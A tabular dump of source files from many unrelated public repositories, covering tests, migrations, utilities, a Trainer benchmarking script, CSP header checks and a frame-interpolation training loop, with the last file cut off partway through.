max_stars_repo_path (stringlengths 4-245) | max_stars_repo_name (stringlengths 7-115) | max_stars_count (int64 101-368k) | id (stringlengths 2-8) | content (stringlengths 6-1.03M) |
---|---|---|---|---|
test/run/t398.py | timmartin/skulpt | 2,671 | 127888 |
<filename>test/run/t398.py
print zip([8, 9, 10], [11, 12, 13])
print zip([1, 2, 3])
print zip()
print zip([])
|
tests/test_project/app_rename_column/migrations/0002_auto_20190414_1502.py | christianbundy/django-migration-linter | 357 | 127950 |
# -*- coding: utf-8 -*-
# Generated by Django 1.11.18 on 2019-04-14 15:02
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [("app_rename_column", "0001_initial")]
operations = [
migrations.RenameField(model_name="a", old_name="field", new_name="renamed")
]
|
scripts/benchmark/trainer-benchmark.py | bugface/transformers | 8,028 | 127961 |
<reponame>bugface/transformers
#!/usr/bin/env python
# HF Trainer benchmarking tool
#
# This tool can be used to run and compare multiple dimensions of the HF Trainer's args.
#
# It then prints the report twice: once in github format with all the information that needs to be shared
# with others, and a second time in a console-friendly format, so it's easier to use for tuning things up.
#
# The main idea is:
#
# ./trainer-benchmark.py --base-cmd '<cmd args that don't change>' \
# --variations '--tf32 0|--tf32 1' '--fp16 0|--fp16 1|--bf16 1' \
# --target-metric-key train_samples_per_second
#
# The variations can be any command line argument that you want to compare and not just dtype as in
# the example.
#
# --variations allows you to compare variations in multiple dimensions.
#
# As the first dimension has 2 options and the second has 3 in our example, this will run the trainer 6
# times, adding one of:
#
# 1. --tf32 0 --fp16 0
# 2. --tf32 0 --fp16 1
# 3. --tf32 0 --bf16 1
# 4. --tf32 1 --fp16 0
# 5. --tf32 1 --fp16 1
# 6. --tf32 1 --bf16 1
#
# and print the results. This is just a cartesian product - and more than 2 dimensions can be used.
#
# If you want to rely on defaults, this:
# --variations '--tf32 0|--tf32 1' '--fp16 0|--fp16 1|--bf16 1'
# is identical to this:
# --variations '--tf32 0|--tf32 1' '|--fp16|--bf16'
#
# the leading empty variation in the 2nd dimension is a valid variation.
#
# So here we get the following 6 variations:
#
# 1. --tf32 0
# 2. --tf32 0 --fp16
# 3. --tf32 0 --bf16
# 4. --tf32 1
# 5. --tf32 1 --fp16
# 6. --tf32 1 --bf16
#
# In this particular case we don't know what the default tf32 setting is, as it's normally
# pytorch-version dependent. That's why it's best to do an explicit setting of each variation:
# `--tf32 0|--tf32 1`
#
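# As a rough illustration of how the expansion works (a sketch with assumed example values,
# mirroring the splitting and cartesian-product logic used further below in this script):
#
#   import itertools
#   dims = [v.split("|") for v in ['--tf32 0|--tf32 1', '|--fp16|--bf16']]
#   variations = [" ".join(p).strip() for p in itertools.product(*dims)]
#   # -> ['--tf32 0', '--tf32 0 --fp16', '--tf32 0 --bf16',
#   #     '--tf32 1', '--tf32 1 --fp16', '--tf32 1 --bf16']
#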
# Here is a full example of a training run:
#
# CUDA_VISIBLE_DEVICES=0 python ./scripts/benchmark/trainer-benchmark.py \
# --base-cmd \
# ' examples/pytorch/translation/run_translation.py --model_name_or_path t5-small \
# --output_dir output_dir --do_train --label_smoothing 0.1 --logging_strategy no \
# --save_strategy no --per_device_train_batch_size 32 --max_source_length 512 \
# --max_target_length 512 --num_train_epochs 1 --overwrite_output_dir \
# --source_lang en --target_lang ro --dataset_name wmt16 --dataset_config "ro-en" \
# --source_prefix "translate English to Romanian: " --warmup_steps 50 \
# --max_train_samples 20000 --dataloader_num_workers 2 ' \
# --target-metric-key train_samples_per_second --repeat-times 1 --variations \
# '|--fp16|--bf16' '--tf32 0|--tf32 1' --report-metric-keys train_loss \
# --repeat-times 1 --base-variation '--tf32 0'
#
# and here is a possible output:
#
#
# | Variation | Train | Diff | Train |
# | | samples | % | loss |
# | | per | | |
# | | second | | |
# |:----------------|----------:|-------:|--------:|
# | --tf32 0 | 285.11 | 0 | 2.51 |
# | --tf32 1 | 342.09 | 20 | 2.51 |
# | --fp16 --tf32 0 | 423.49 | 49 | 2.51 |
# | --fp16 --tf32 1 | 423.13 | 48 | 2.51 |
# | --bf16 --tf32 0 | 416.80 | 46 | 2.52 |
# | --bf16 --tf32 1 | 415.87 | 46 | 2.52 |
#
#
# So you can quickly compare the different outcomes.
#
# Typically running each experiment once is enough, but if the environment is unstable you can
# re-run each one multiple times, e.g., 3 times via --repeat-times 3, and it will report the averaged results.
#
# By default it'll use the lowest result as the baseline (100%) and then compare the rest to it, as
# can be seen in the table above, but you can also specify which combination is the one to use as
# the baseline, e.g., to change to another entry use: --base-variation '--tf32 1 --fp16 0'
#
# --target-metric-key is there to tell the program which metrics to compare - the different metric keys are
# inside output_dir/all_results.json. e.g., to measure eval performance instead of train use:
# --target-metric-key eval_samples_per_second
# but of course you will need to adjust the --base-cmd value in the example to perform evaluation as
# well (as currently it doesn't)
#
import argparse
import datetime
import io
import itertools
import json
import math
import os
import platform
import re
import shlex
import subprocess
import sys
from pathlib import Path
from statistics import fmean
import pandas as pd
import torch
from tqdm import tqdm
import transformers
nan = float("nan")
class Tee:
"""
A helper class to tee print's output into a file.
Usage:
sys.stdout = Tee(filename)
"""
def __init__(self, filename):
self.stdout = sys.stdout
self.file = open(filename, "a")
def __getattr__(self, attr):
return getattr(self.stdout, attr)
def write(self, msg):
self.stdout.write(msg)
# strip tqdm codes
self.file.write(re.sub(r"^.*\r", "", msg, 0, re.M))
def get_original_command(max_width=80, full_python_path=False):
"""
Return the original command line string that can be replayed nicely and wrapped for 80 char width.
Args:
max_width (`int`, `optional`, defaults to 80):
The width to wrap for.
full_python_path (`bool`, `optional`, defaults to `False`):
Whether to replicate the full path or just the last segment (i.e. `python`).
"""
cmd = []
# deal with critical env vars
env_keys = ["CUDA_VISIBLE_DEVICES"]
for key in env_keys:
val = os.environ.get(key, None)
if val is not None:
cmd.append(f"{key}={val}")
# python executable (not always needed if the script is executable)
python = sys.executable if full_python_path else sys.executable.split("/")[-1]
cmd.append(python)
# now the normal args
cmd += list(map(shlex.quote, sys.argv))
# split up into up to MAX_WIDTH lines with shell multi-line escapes
lines = []
current_line = ""
while len(cmd) > 0:
current_line += f"{cmd.pop(0)} "
if len(cmd) == 0 or len(current_line) + len(cmd[0]) + 1 > max_width - 1:
lines.append(current_line)
current_line = ""
return "\\\n".join(lines)
def get_base_command(args, output_dir):
# unwrap multi-line input
args.base_cmd = re.sub(r"[\\\n]+", " ", args.base_cmd)
# remove --output_dir if any and set our own
args.base_cmd = re.sub(r"--output_dir\s+[^\s]+", "", args.base_cmd)
args.base_cmd += f" --output_dir {output_dir}"
# ensure we have --overwrite_output_dir
args.base_cmd = re.sub(r"--overwrite_output_dir\s+", "", args.base_cmd)
args.base_cmd += " --overwrite_output_dir"
return [sys.executable] + shlex.split(args.base_cmd)
def process_run_single(id, cmd, variation, output_dir, target_metric_key, metric_keys, verbose):
# Enable this to debug everything except the run itself, so it goes fast and you can see the progress.
# This is useful for debugging the output formatting quickly - we can remove it later once
# everybody is happy with the output
if 0:
import random
from time import sleep
sleep(0)
return dict(
{k: random.uniform(0, 100) for k in metric_keys},
**{target_metric_key: random.choice([nan, 10.31, 100.2, 55.6666, 222.22222222])},
)
result = subprocess.run(cmd, capture_output=True, text=True)
if verbose:
print("STDOUT", result.stdout)
print("STDERR", result.stderr)
# save the streams
prefix = variation.replace(" ", "-")
with open(Path(output_dir) / f"log.{prefix}.stdout.txt", "w") as f:
f.write(result.stdout)
with open(Path(output_dir) / f"log.{prefix}.stderr.txt", "w") as f:
f.write(result.stderr)
if result.returncode != 0:
if verbose:
print("failed")
return {target_metric_key: nan}
with io.open(f"{output_dir}/all_results.json", "r", encoding="utf-8") as f:
metrics = json.load(f)
# filter out just the keys we want
return {k: v for k, v in metrics.items() if k in metric_keys}
def process_run(
id,
cmd,
variation_key,
variation,
longest_variation_len,
target_metric_key,
report_metric_keys,
repeat_times,
output_dir,
verbose,
):
results = []
metrics = []
preamble = f"{id}: {variation:<{longest_variation_len}}"
outcome = f"{preamble}: "
metric_keys = set(report_metric_keys + [target_metric_key])
for i in tqdm(range(repeat_times), desc=preamble, leave=False):
single_run_metrics = process_run_single(
id, cmd, variation, output_dir, target_metric_key, metric_keys, verbose
)
result = single_run_metrics[target_metric_key]
if not math.isnan(result):
metrics.append(single_run_metrics)
results.append(result)
outcome += "✓"
else:
outcome += "✘"
outcome = f"\33[2K\r{outcome}"
if len(metrics) > 0:
mean_metrics = {k: fmean([x[k] for x in metrics]) for k in metrics[0].keys()}
mean_target = round(mean_metrics[target_metric_key], 2)
results_str = f"{outcome} {mean_target}"
if len(metrics) > 1:
results_str += f" {tuple(round(x, 2) for x in results)}"
print(results_str)
mean_metrics[variation_key] = variation
return mean_metrics
else:
print(outcome)
return {variation_key: variation, target_metric_key: nan}
def get_versions():
properties = torch.cuda.get_device_properties(torch.device("cuda"))
return f"""
Datetime : {datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')}
Software:
transformers: {transformers.__version__}
torch : {torch.__version__}
cuda : {torch.version.cuda}
python : {platform.python_version()}
Hardware:
{torch.cuda.device_count()} GPUs : {properties.name}, {properties.total_memory/2**30:0.2f}GB
"""
def process_results(results, target_metric_key, report_metric_keys, base_variation, output_dir):
df = pd.DataFrame(results)
variation_key = "variation"
diff_key = "diff_%"
sentinel_value = nan
if base_variation is not None and len(df[df[variation_key] == base_variation]):
# this may still return nan
sentinel_value = df.loc[df[variation_key] == base_variation][target_metric_key].item()
if math.isnan(sentinel_value):
# as a fallback, use the minimal value as the sentinel
sentinel_value = df.loc[df[target_metric_key] != nan][target_metric_key].min()
# create diff column if possible
if not math.isnan(sentinel_value):
df[diff_key] = df.apply(
lambda r: round(100 * (r[target_metric_key] - sentinel_value) / sentinel_value)
if not math.isnan(r[target_metric_key])
else 0,
axis="columns",
)
# re-order columns
cols = [variation_key, target_metric_key, diff_key, *report_metric_keys]
df = df.reindex(cols, axis="columns") # reorder cols
# capitalize
df = df.rename(str.capitalize, axis="columns")
# make the cols as narrow as possible
df_github = df.rename(lambda c: c.replace("_", "<br>"), axis="columns")
df_console = df.rename(lambda c: c.replace("_", "\n"), axis="columns")
report = ["", "Copy between the cut-here-lines and paste as is to github or a forum"]
report += ["----------8<-----------------8<--------"]
report += ["*** Results:", df_github.to_markdown(index=False, floatfmt=".2f")]
report += ["```"]
report += ["*** Setup:", get_versions()]
report += ["*** The benchmark command line was:", get_original_command()]
report += ["```"]
report += ["----------8<-----------------8<--------"]
report += ["*** Results (console):", df_console.to_markdown(index=False, floatfmt=".2f")]
print("\n\n".join(report))
def main():
parser = argparse.ArgumentParser()
parser.add_argument(
"--base-cmd",
default=None,
type=str,
required=True,
help="Base cmd",
)
parser.add_argument(
"--variations",
default=None,
type=str,
nargs="+",
required=True,
help="Multi-dimensional variations, example: '|--fp16|--bf16' '|--tf32'",
)
parser.add_argument(
"--base-variation",
default=None,
type=str,
help="Baseline variation to compare to. If None, the minimal target value will be used to compare against",
)
parser.add_argument(
"--target-metric-key",
default=None,
type=str,
required=True,
help="Target metric key in output_dir/all_results.json, e.g., train_samples_per_second",
)
parser.add_argument(
"--report-metric-keys",
default="",
type=str,
help="Report metric keys - other metric keys from output_dir/all_results.json to report, e.g., train_loss. Use a single argument, e.g., 'train_loss train_samples'",
)
parser.add_argument(
"--repeat-times",
default=1,
type=int,
help="How many times to re-run each variation - an average will be reported",
)
parser.add_argument(
"--output_dir",
default="output_benchmark",
type=str,
help="The output directory where all the benchmark reports will go; additionally, this directory will be used to override --output_dir in the script that is being benchmarked",
)
parser.add_argument(
"--verbose",
default=False,
action="store_true",
help="Whether to show the outputs of each run or just the benchmark progress",
)
args = parser.parse_args()
output_dir = args.output_dir
Path(output_dir).mkdir(exist_ok=True)
base_cmd = get_base_command(args, output_dir)
# split each dimension into its --foo variations
dims = [list(map(str.strip, re.split(r"\|", x))) for x in args.variations]
# build a cartesian product of dimensions and convert those back into cmd-line arg strings,
# while stripping white space for inputs that were empty
variations = list(map(str.strip, map(" ".join, itertools.product(*dims))))
longest_variation_len = max(len(x) for x in variations)
# split wanted keys
report_metric_keys = args.report_metric_keys.split()
# capture prints into a log file for convenience
report_fn = f"benchmark-report-{datetime.datetime.now().strftime('%Y-%m-%d-%H-%M-%S')}.txt"
print(f"\nNote: each run's output is also logged under {output_dir}/log.*.std*.txt")
print(f"and this script's output is also piped into {report_fn}")
sys.stdout = Tee(report_fn)
print(f"\n*** Running {len(variations)} benchmarks:")
print(f"Base command: {' '.join(base_cmd)}")
variation_key = "variation"
results = []
for id, variation in enumerate(tqdm(variations, desc="Total completion: ", leave=False)):
cmd = base_cmd + variation.split()
results.append(
process_run(
id + 1,
cmd,
variation_key,
variation,
longest_variation_len,
args.target_metric_key,
report_metric_keys,
args.repeat_times,
output_dir,
args.verbose,
)
)
process_results(results, args.target_metric_key, report_metric_keys, args.base_variation, output_dir)
if __name__ == "__main__":
main()
|
tests/integration/test_archive_per_month.py | asmeurer/nikola | 1,901 | 128017 |
<gh_stars>1000+
"""Check that the monthly archives build and are correct."""
import os
import pytest
from nikola import __main__
from .helper import cd, patch_config
from .test_demo_build import prepare_demo_site
from .test_empty_build import ( # NOQA
test_archive_exists,
test_avoid_double_slash_in_rss,
test_check_files,
test_check_links,
test_index_in_sitemap,
)
def test_monthly_archive(build, output_dir):
"""Check that the monthly archive is built."""
assert os.path.isfile(os.path.join(output_dir, "2012", "03", "index.html"))
@pytest.fixture(scope="module")
def build(target_dir):
"""Fill the site with demo content and build it."""
prepare_demo_site(target_dir)
patch_config(
target_dir,
("# CREATE_MONTHLY_ARCHIVE = False", "CREATE_MONTHLY_ARCHIVE = True"),
)
with cd(target_dir):
__main__.main(["build"])
|
src/exabgp/configuration/core/location.py | pierky/exabgp | 1,560 | 128037 |
<gh_stars>1000+
# encoding: utf-8
"""
location.py
Created by <NAME> on 2014-06-22.
Copyright (c) 2014-2017 Exa Networks. All rights reserved.
License: 3-clause BSD. (See the COPYRIGHT file)
"""
# ===================================================================== Location
# file location
class Location(object):
def __init__(self, index_line=0, index_column=0, line=''):
self.line = line
self.index_line = index_line
self.index_column = index_column
def clear(self):
self.index_line = 0
self.index_column = 0
self.line = ''
class Error(Exception):
tabsize = 3
syntax = ''
def __init__(self, location, message, syntax=''):
self.line = location.line.replace('\t', ' ' * self.tabsize)
self.index_line = location.index_line
self.index_column = location.index_column + (self.tabsize - 1) * location.line[: location.index_column].count(
'\t'
)
self.message = '\n\n'.join(
(
'problem parsing configuration file line %d position %d'
% (location.index_line, location.index_column + 1),
'error message: %s' % message.replace('\t', ' ' * self.tabsize),
'%s%s' % (self.line, '-' * self.index_column + '^'),
)
)
# allow giving the right syntax when using Raised
if syntax:
self.message += '\n\n' + syntax
Exception.__init__(self)
def __repr__(self):
return self.message
|
aiogoogle/utils.py | BebopChrome/aiogoogle | 115 | 128057 |
__all__ = []
import datetime
import re
def _safe_getitem(dct, *keys):
for key in keys:
try:
dct = dct[key]
except (KeyError):
return None
return dct
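# Illustrative sketch (not in the original module) of what _safe_getitem returns:
#
#   _safe_getitem({"a": {"b": 1}}, "a", "b")   # -> 1
#   _safe_getitem({"a": {}}, "a", "b")         # -> None (the missing key is swallowed)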
class _dict(dict): # pragma: no cover
""" A simple dict subclass for use with Creds modelling. No surprises """
def __init__(self, *args, **kwargs): # pragma: no cover
super(_dict, self).__init__(*args, **kwargs)
for arg in args:
if isinstance(arg, dict):
for k, v in arg.items():
self[k] = v
if kwargs:
for k, v in kwargs.items():
self[k] = v
def __getattr__(self, attr): # pragma: no cover
return self.get(attr)
def __setattr__(self, key, value): # pragma: no cover
self.__setitem__(key, value)
def __setitem__(self, key, value): # pragma: no cover
super(_dict, self).__setitem__(key, value)
self.__dict__.update({key: value})
def __delattr__(self, item): # pragma: no cover
self.__delitem__(item)
def __delitem__(self, key): # pragma: no cover
super(_dict, self).__delitem__(key)
del self.__dict__[key]
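# Minimal usage sketch (illustrative values, not part of the original module):
#
#   d = _dict({"token": "abc"}, expires_in=3600)
#   d.token           # -> 'abc'   (attribute-style access)
#   d["expires_in"]   # -> 3600
#   d.missing         # -> None    (unknown attributes resolve to None via __getattr__)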
def _parse_time_components(tstr):
# supported format is HH[:MM[:SS[.fff[fff]]]]
if len(tstr) < 2:
raise ValueError("Invalid Isotime format")
hh = tstr[:2]
mm_ss = re.findall(r":(\d{2})", tstr)
ff = re.findall(r"\.(\d+)", tstr)
if ff and not len(ff[0]) in [3, 6]:
raise ValueError("Invalid Isotime format")
ff = ff[0] if ff else []
# ensure tstr was valid
if len(mm_ss) < 2 and ff:
raise ValueError("Invalid Isotime format")
parsed_str = hh + (":" + ":".join(mm_ss) if mm_ss else "") + \
("." + ff if ff else "")
if parsed_str != tstr:
raise ValueError("Invalid Isotime format")
components = [int(hh)]
if mm_ss:
components.extend(int(t) for t in mm_ss)
if ff:
components.append(int(ff.ljust(6, "0")))
return components + [0] * (4 - len(components))
def _parse_isoformat(dtstr):
# supported format is YYYY-mm-dd[THH[:MM[:SS[.fff[fff]]]]][+HH:MM[:SS[.ffffff]]]
dstr = dtstr[:10]
tstr = dtstr[11:]
try:
date = datetime.datetime.strptime(dstr, "%Y-%m-%d")
except ValueError as e:
raise ValueError("Invalid Isotime format") from e
if tstr:
# check for time zone
tz_pos = (tstr.find("-") + 1 or tstr.find("+") + 1)
if tz_pos > 0:
tzsign = -1 if tstr[tz_pos - 1] == "-" else 1
tz_comps = _parse_time_components(tstr[tz_pos:])
tz = tzsign * datetime.timedelta(
hours=tz_comps[0], minutes=tz_comps[1],
seconds=tz_comps[2], microseconds=tz_comps[3])
tstr = tstr[:tz_pos - 1]
else:
tz = datetime.timedelta(0)
time_comps = _parse_time_components(tstr)
date = date.replace(hour=time_comps[0], minute=time_comps[1],
second=time_comps[2], microsecond=time_comps[3])
date -= tz
elif len(dtstr) == 11:
raise ValueError("Invalid Isotime format")
return date
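# Rough usage sketch (illustrative values, not part of the original module):
#
#   _parse_time_components("10:30:05.123")        # -> [10, 30, 5, 123000]
#   _parse_isoformat("2021-08-10T05:24:00+02:00")
#   # -> datetime.datetime(2021, 8, 10, 3, 24)    (the offset is subtracted, i.e. normalized to UTC)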
|
historian/cli/db.py | bit0fun/plugins | 173 | 128072 |
<reponame>bit0fun/plugins
import click
from common import NodeAnnouncement, ChannelAnnouncement, ChannelUpdate
from tqdm import tqdm
from gossipd import parse
from cli.common import db_session, default_db
@click.group()
def db():
pass
@db.command()
@click.argument('source', type=str)
@click.argument('destination', type=str, default=default_db)
def merge(source, destination):
"""Merge two historian databases by copying from source to destination.
"""
meta = {
'channel_announcements': None,
'channel_updates': None,
'node_announcements': None,
}
with db_session(source) as source, db_session(destination) as target:
# Not strictly necessary, but I like progress indicators and ETAs.
for table in meta.keys():
rows = source.execute(f"SELECT count(*) FROM {table}")
count, = rows.next()
meta[table] = count
for r, in tqdm(
source.execute("SELECT raw FROM channel_announcements"),
total=meta['channel_announcements'],
):
msg = parse(r)
if isinstance(r, memoryview):
r = bytes(r)
target.merge(ChannelAnnouncement.from_gossip(msg, r))
for r, in tqdm(
source.execute("SELECT raw FROM channel_updates ORDER BY timestamp ASC"),
total=meta['channel_updates'],
):
msg = parse(r)
if isinstance(r, memoryview):
r = bytes(r)
target.merge(ChannelUpdate.from_gossip(msg, r))
for r, in tqdm(
source.execute("SELECT raw FROM node_announcements ORDER BY timestamp ASC"),
total=meta['node_announcements'],
):
msg = parse(r)
if isinstance(r, memoryview):
r = bytes(r)
target.merge(NodeAnnouncement.from_gossip(msg, r))
target.commit()
|
src/modeling/bert/__init__.py | microsoft/MeshGraphormer | 135 | 128106 |
__version__ = "1.0.0"
from .modeling_bert import (BertConfig, BertModel,
load_tf_weights_in_bert, BERT_PRETRAINED_MODEL_ARCHIVE_MAP,
BERT_PRETRAINED_CONFIG_ARCHIVE_MAP)
from .modeling_graphormer import Graphormer
from .e2e_body_network import Graphormer_Body_Network
from .e2e_hand_network import Graphormer_Hand_Network
from .modeling_utils import (WEIGHTS_NAME, CONFIG_NAME, TF_WEIGHTS_NAME,
PretrainedConfig, PreTrainedModel, prune_layer, Conv1D)
from .file_utils import (PYTORCH_PRETRAINED_BERT_CACHE, cached_path)
|
src/lib/pdb.py | DTenore/skulpt | 2,671 | 128113 |
<reponame>DTenore/skulpt<filename>src/lib/pdb.py<gh_stars>1000+
import _sk_fail; _sk_fail._("pdb")
|
api/anomaly/migrations/0017_merge_20210810_0524.py | LeiSoft/CueObserve | 149 | 128122 |
# Generated by Django 3.2.1 on 2021-08-10 05:24
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('anomaly', '0015_merge_20210806_0248'),
('anomaly', '0016_merge_20210806_1138'),
]
operations = [
]
|
securityheaders/checkers/csp/test_srchttp.py | th3cyb3rc0p/securityheaders | 151 | 128143 |
<reponame>th3cyb3rc0p/securityheaders
import unittest
from securityheaders.checkers.csp import CSPSCRHTTPChecker, CSPReportOnlySCRHTTPChecker
class HTTPTest(unittest.TestCase):
def setUp(self):
self.x = CSPSCRHTTPChecker()
self.y = CSPReportOnlySCRHTTPChecker()
def test_checkNoCSP(self):
nox = dict()
nox['test'] = 'value'
self.assertEqual(self.x.check(nox), [])
def test_checkNone(self):
nonex = None
self.assertEqual(self.x.check(nonex), [])
def test_NoneCSP(self):
hasx = dict()
hasx['content-security-policy'] = None
self.assertEqual(self.x.check(hasx), [])
def test_HTTPURI(self):
hasx3 = dict()
hasx3['content-security-policy'] = "report-uri http://foo.bar/csp"
result = self.x.check(hasx3)
self.assertIsNotNone(result)
self.assertEqual(len(result), 1)
def test_HTTPSURI(self):
hasx4 = dict()
hasx4['content-security-policy'] = "report-uri https://foo.bar/csp"
self.assertEqual(self.x.check(hasx4), [])
def test_HTTPURIRO(self):
hasx3 = dict()
hasx3['content-security-policy-report-only'] = "report-uri http://foo.bar/csp"
result = self.y.check(hasx3)
self.assertIsNotNone(result)
self.assertEqual(len(result), 1)
def test_HTTPSURIRO(self):
hasx4 = dict()
hasx4['content-security-policy-report-only'] = "report-uri https://foo.bar/csp"
self.assertEqual(self.y.check(hasx4), [])
def test_NoURI(self):
hasx2 = dict()
hasx2['content-security-policy'] = "default-src 'self'; script-src 'nonce-4AEemGb0xJptoIGFP3Nd'"
self.assertEqual(self.x.check(hasx2), [])
if __name__ == '__main__':
unittest.main()
|
tests/basics/async_with_break.py | sebastien-riou/micropython | 13,648 | 128190 |
# test async with, escaped by a break
class AContext:
async def __aenter__(self):
print('enter')
return 1
async def __aexit__(self, exc_type, exc, tb):
print('exit', exc_type, exc)
async def f1():
while 1:
async with AContext():
print('body')
break
print('no 1')
print('no 2')
o = f1()
try:
print(o.send(None))
except StopIteration:
print('finished')
async def f2():
while 1:
try:
async with AContext():
print('body')
break
print('no 1')
finally:
print('finally')
print('no 2')
o = f2()
try:
print(o.send(None))
except StopIteration:
print('finished')
async def f3():
while 1:
try:
try:
async with AContext():
print('body')
break
print('no 1')
finally:
print('finally inner')
finally:
print('finally outer')
print('no 2')
o = f3()
try:
print(o.send(None))
except StopIteration:
print('finished')
|
api/tests/opentrons/drivers/test_command_builder.py | anuwrag/opentrons | 235 | 128202 |
<filename>api/tests/opentrons/drivers/test_command_builder.py
from typing import Optional
import pytest
from opentrons.drivers.command_builder import CommandBuilder
def test_builder_create_command_with_terminator() -> None:
"""It should create a command with terminator."""
terminator = "terminator"
builder = CommandBuilder(terminator=terminator)
assert builder.build() == "terminator"
@pytest.mark.parametrize(
argnames=["value", "precision", "expected_float"],
argvalues=[
[1.2342, 3, 1.234],
[1.2342, None, 1.2342],
[1.2342, 0, 1.0],
],
)
def test_builder_create_command_add_float(
value: float, precision: Optional[int], expected_float: float
) -> None:
"""It should create a command with a floating point value."""
terminator = "terminator"
builder = CommandBuilder(terminator=terminator)
assert (
builder.add_float(prefix="Z", value=value, precision=precision).build()
== f"Z{expected_float} terminator"
)
def test_builder_create_command_add_int() -> None:
"""It should create a command with an integer value."""
terminator = "terminator"
builder = CommandBuilder(terminator=terminator)
assert builder.add_int(prefix="Z", value=15).build() == f"Z15 {terminator}"
def test_builder_create_command_add_gcode() -> None:
"""It should create a command with a GCODE."""
terminator = "terminator"
builder = CommandBuilder(terminator=terminator)
assert builder.add_gcode(gcode="G321").build() == f"G321 {terminator}"
def test_builder_create_command_add_builder() -> None:
"""It should create a command from the words in another builder."""
terminator = "terminator"
builder = CommandBuilder(terminator=terminator)
assert builder.add_gcode(gcode="G321").build() == f"G321 {terminator}"
builder2 = CommandBuilder(terminator=terminator)
assert (
builder2.add_builder(builder=builder)
.add_gcode(gcode="G123")
.add_builder(builder=builder)
.build()
== f"G321 G123 G321 {terminator}"
)
def test_builder_chain() -> None:
"""It should create a command using chaining."""
terminator = "terminator"
builder = CommandBuilder(terminator=terminator)
assert (
builder.add_gcode(gcode="G321")
.add_float(prefix="X", value=321, precision=3)
.add_gcode(gcode="M321")
.add_int(prefix="Z", value=3)
.add_gcode("G111")
.build()
== f"G321 X321 M321 Z3 G111 {terminator}"
)
|
training/train_lib.py | vsewall/frame-interpolation | 521 | 128205 |
<reponame>vsewall/frame-interpolation
# Copyright 2022 Google LLC
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# https://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
r"""Training library for frame interpolation using distributed strategy."""
import functools
from typing import Any, Callable, Dict, Text, Tuple
from absl import logging
import tensorflow as tf
def _concat_tensors(tensors: tf.Tensor) -> tf.Tensor:
"""Concat tensors of the different replicas."""
return tf.concat(tf.nest.flatten(tensors, expand_composites=True), axis=0)
@tf.function
def _distributed_train_step(strategy: tf.distribute.Strategy,
batch: Dict[Text, tf.Tensor], model: tf.keras.Model,
loss_functions: Dict[Text,
Tuple[Callable[..., tf.Tensor],
Callable[...,
tf.Tensor]]],
optimizer: tf.keras.optimizers.Optimizer,
iterations: int) -> Dict[Text, Any]:
"""Distributed training step.
Args:
strategy: A Tensorflow distribution strategy.
batch: A batch of training examples.
model: The Keras model to train.
loss_functions: The dictionary of (loss, loss-weight schedule) callables used to train the model.
optimizer: The Keras optimizer used to train the model.
iterations: Iteration number used to sample weights to each loss.
Returns:
A dictionary of train step outputs.
"""
def _train_step(batch: Dict[Text, tf.Tensor]) -> Dict[Text, tf.Tensor]:
"""Train for one step."""
with tf.GradientTape() as tape:
predictions = model(batch, training=True)
losses = []
for (loss_value, loss_weight) in loss_functions.values():
losses.append(loss_value(batch, predictions) * loss_weight(iterations))
loss = tf.add_n(losses)
grads = tape.gradient(loss, model.trainable_variables)
optimizer.apply_gradients(zip(grads, model.trainable_variables))
# post process for visualization
all_data = {'loss': loss}
all_data.update(batch)
all_data.update(predictions)
return all_data
step_outputs = strategy.run(_train_step, args=(batch,))
loss = strategy.reduce(
tf.distribute.ReduceOp.MEAN, step_outputs['loss'], axis=None)
x0 = _concat_tensors(step_outputs['x0'])
x1 = _concat_tensors(step_outputs['x1'])
y = _concat_tensors(step_outputs['y'])
pred_y = _concat_tensors(step_outputs['image'])
scalar_summaries = {'training_loss': loss}
image_summaries = {
'x0': x0,
'x1': x1,
'y': y,
'pred_y': pred_y
}
extra_images = {
'importance0', 'importance1', 'x0_warped', 'x1_warped', 'fg_image',
'bg_image', 'fg_alpha', 'x1_unfiltered_warped'
}
for image in extra_images:
if image in step_outputs:
image_summaries[image] = _concat_tensors(step_outputs[image])
return {
'loss': loss,
'scalar_summaries': scalar_summaries,
'image_summaries': {
f'training/{name}': value for name, value in image_summaries.items()
}
}
def _summary_writer(summaries_dict: Dict[Text, Any]) -> None:
"""Adds scalar and image summaries."""
# Adds scalar summaries.
for key, scalars in summaries_dict['scalar_summaries'].items():
tf.summary.scalar(key, scalars)
# Adds image summaries.
for key, images in summaries_dict['image_summaries'].items():
tf.summary.image(key, tf.clip_by_value(images, 0.0, 1.0))
tf.summary.histogram(key + '_h', images)
def train_loop(
strategy: tf.distribute.Strategy,
train_set: tf.data.Dataset,
create_model_fn: Callable[..., tf.keras.Model],
create_losses_fn: Callable[..., Dict[str, Tuple[Callable[..., tf.Tensor],
Callable[..., tf.Tensor]]]],
create_optimizer_fn: Callable[..., tf.keras.optimizers.Optimizer],
distributed_train_step_fn: Callable[[
tf.distribute.Strategy, Dict[str, tf.Tensor], tf.keras.Model, Dict[
str,
Tuple[Callable[..., tf.Tensor],
Callable[..., tf.Tensor]]], tf.keras.optimizers.Optimizer, int
], Dict[str, Any]],
eval_loop_fn: Callable[..., None],
create_metrics_fn: Callable[..., Dict[str, tf.keras.metrics.Metric]],
eval_folder: Dict[str, Any],
eval_datasets: Dict[str, tf.data.Dataset],
summary_writer_fn: Callable[[Dict[str, Any]], None],
train_folder: str,
saved_model_folder: str,
num_iterations: int,
save_summaries_frequency: int = 500,
save_checkpoint_frequency: int = 500,
checkpoint_max_to_keep: int = 10,
checkpoint_save_every_n_hours: float = 2.,
timing_frequency: int = 100,
logging_frequency: int = 10):
"""A Tensorflow 2 eager mode training loop.
Args:
strategy: A Tensorflow distributed strategy.
train_set: A tf.data.Dataset to loop through for training.
create_model_fn: A callable that returns a tf.keras.Model.
create_losses_fn: A callable that returns a tf.keras.losses.Loss.
create_optimizer_fn: A callable that returns a
tf.keras.optimizers.Optimizer.
distributed_train_step_fn: A callable that takes a distribution strategy, a
Dict[Text, tf.Tensor] holding the batch of training data, a
tf.keras.Model, a tf.keras.losses.Loss, a tf.keras.optimizers.Optimizer,
iteration number used to sample a weight value for the loss functions,
and returns a dictionary to be passed to the summary_writer_fn.
